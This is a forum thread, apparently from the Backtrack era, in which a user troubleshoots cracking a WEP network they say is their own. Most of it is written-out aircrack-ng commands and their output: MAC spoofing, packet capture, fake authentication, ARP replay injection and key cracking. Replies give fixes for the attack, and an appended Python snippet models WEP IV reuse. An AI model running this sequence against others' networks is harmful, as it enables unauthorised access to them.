Hey Everyone
Second attempt .. so I cut the convo and just discuss the issue directly.
After having some "wireless issues" I decided to look into things a bit deeper in order to learn about how to protect myself. I already learnt one thing: block the MAC address of 00:11:22:33:44:55. So I want to see how someone got into my system. OK ... so I'm using
Backtrack 3 LiveCD (after spending a few hours doing USB, I found my BIOS didn't allow USB booting .. good lesson for the kiddies)
Wireless card is a Dlink Air Plus Xtreme G DWL-G520 HW:B3 FW:4.30
OK ... this is what I do ... and this is what I get back
Open Shell
-> airmon-ng
wifi0 - atheros - madwifi-ng
ath0 - atheros - madwifi-ng VAP (parent: wifi0)
-> airmon-ng stop ath0
wifi0 - atheros - madwifi-ng
ath0 - atheros - madwifi-ng VAP (parent: wifi0) (VAP Destroyed)
-> ifconfig wifi0 down (i tried ath0 but i get an error saying no such device) just goes to next prompt
->macchanger --mac 00:11:22:33:44:55 wifi0
Current MAC: 00:13:46:xx:xx:xx
Faked MAC: 00:11:22:33:44:55
-> airmon-ng start wifi0
wifi0 - Atheros - madwifi-ng
ath0 - Atheros - madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
->airodump-ng ath0
I find my network
BSSID:00:15:xx:xx:xx:xx PWR:27 Beacons: 23 #data:0 #/s:0 CH:6 MB:54 ENC:WEP CIPHER:WEP Essid:EBC
-> airodump-ng -c 6 -w weppy -bssid 00:15:xx:xx:xx:xx ath0
BSSID:00:15:xx:etc PWR:34 RXQ:100 Beacons:1500 (and counting) #data:70 (and counting slowly) #/s:0 CH:6 MB:54 ENC:WEP CIPHER:WEP ESSID:EBC
Opening a new shell, leaving the other running, I type
-> aireplay-ng -1 0 -a 00:15:xx:etc -h 00:11:22:33:44:55 -e EBC ath0
Sending Authtication Request (open System) [ACK]
Authentication successful
Sending Association Request [ACK]
Assoication successful :-) (AID: 1)
-- ISSUES START HERE --
-> aireplay-ng -3 -b 00:15:xx:etc -h 00:11:22:33:44:55 ath0
Waiting for beacon frame (BSSID 00:15:xx:etc) on channel 6
Saving ARP requests in replay_arp-1203-020546.cap
You should also start airodump-ng to capture replies
Read 2000 (and counting rapidly) packets (got 0 ARP requests and 0 ACKs) sent 0 packets...(0 pps)
So this is meant to be the important packet injection that I read so many others have issues with ....
Now I did the check on my card and it should be working .. but it isn't .. the #data which I expect would be going up .. doesn't .. AND I don't get ARP numbers going up ....
Any suggestions would be lovely ...
Thanks guys.
Aiban
Try to use wesside-ng instead of what you are doing
OK .. I can fix that .. probably ... but it's the only wireless machine I have .. but I got parts to build a quick system and dump some crappy Netgear card I have lying around into it for the sake of this test .. but it is a lot of mucking around (I don't have enough monitors etc. so it'll be fun to try hahahah), so I hope that this is correct (I'm not doubting of course lol) ... but thanks .. I'll give that a go!
OK ... after some scrambling .. I got a laptop to borrow from a friend.
I set it up to use my wireless - and this is what happens....
aireplay-ng -3 -b 00:15:xx:etc -h 00:11:22:33:44:55 ath0
I started some web browsing and a free 1gb download from my ISP's homepage to make sure there was a constant flow of information.
It reads the packets .. and after a short wait, it said I got 1 ARP, and the ACK and sent started moving like crazy, with the pps shifting from 499/500
BUT ... every few seconds I would get this message
"Notice: got a deauth/disassoc packet. Is the source MAC associated ?"
Very slowly .. i got a few more ARP requests ... but only about 5 in 15 minutes.
The other console screen shows the #data rapidly rising and at 30000 i used the
-> aircrack -n 64 -b 00:15:xx:etc weppy-01.cap
It failed after a minute and tells me it'll retry at another 5000 IVs - it has been going and well past 65000 on the next attempt before I aborted.
I'm not sure what this deauth means, I don't know how to get the ARP higher, which I assume is a goal to success, but I'm using the internet on the laptop trying to excite the wireless... multiple tabs open, downloads, but ARPs are slow and this deauth notice fills my screen.
Thanks for the help so far, it has pushed me further into this ... but need more pushing..
Thank you
Hey mate - what does this mean?
"Try to use wesside-ng instead of what you are doing"
In place of where? I'm in noobie area 'cause I'm just following other guides and my knowledge of Backtrack doesn't extend beyond those tutes' borders.
Wesside-ng is an automated tool/script for cracking WEP, that being said I have tried it a few times but prefer the manual approach.
The error output you get means that you have been disassociated from the AP, which means that it will no longer accept the packets you inject. This is the reason why you notice that the IVs stop climbing as the AP will disregard your injected packets and not give you any response. The fix is however simple, just perform the fake authentication attack again each time this happens (aireplay-ng -1 0...), also make sure that you did not miss this step in the first place. The goal is not to get the ARP count to climb, actually you can crack WEP without ever obtaining a single ARP-request, what you want is for the #data (IVs) count to climb.
Furthermore, you are using the -n 64 mode in aircrack-ng, which means that if the key isn't actually 64 bits long you will never find it regardless of the amount of packets you collect.
-Monkeys are like nature's humans.
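
Added example, not part of the thread and not aircrack-ng code: a small Python model of why the last reply stresses the #data (IV) count and the key length. It assumes the standard WEP layout (a 3-byte IV sent in the clear, prepended to a 5-byte or 13-byte shared key to seed RC4), random IV selection, and constructed sample frames; the ICV is left out.

```python
import math

IV_BITS = 24  # WEP prepends a 24-bit IV, sent in the clear, to the shared key

def rc4_keystream(seed: bytes, n: int) -> bytes:
    """Plain RC4: key scheduling followed by n bytes of output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + seed[i % len(seed)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """Per-frame RC4 seed is IV || key; the ICV is omitted for brevity."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("IV is 3 bytes; key is 5 ('64-bit') or 13 ('128-bit') bytes")
    ks = rc4_keystream(iv + key, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def iv_reuse_probability(frames: int) -> float:
    """Birthday bound: chance that at least two of `frames` random IVs match."""
    space = 2 ** IV_BITS
    return 1.0 - math.exp(-frames * (frames - 1) / (2 * space))

# Constructed sample values, not taken from the thread.
KEY_64 = bytes.fromhex("0102030405")  # 5 secret bytes + 3 IV bytes = "64-bit"
IV = bytes.fromhex("a1b2c3")
FRAME_A = b"constructed frame A"
FRAME_B = b"constructed frame B"

def demo():
    ca = wep_encrypt(IV, KEY_64, FRAME_A)
    cb = wep_encrypt(IV, KEY_64, FRAME_B)
    # Same IV and key -> same keystream, so the key cancels out of ca XOR cb.
    return xor(ca, cb) == xor(FRAME_A, FRAME_B), iv_reuse_probability(30000)

if __name__ == "__main__":
    print(demo())
```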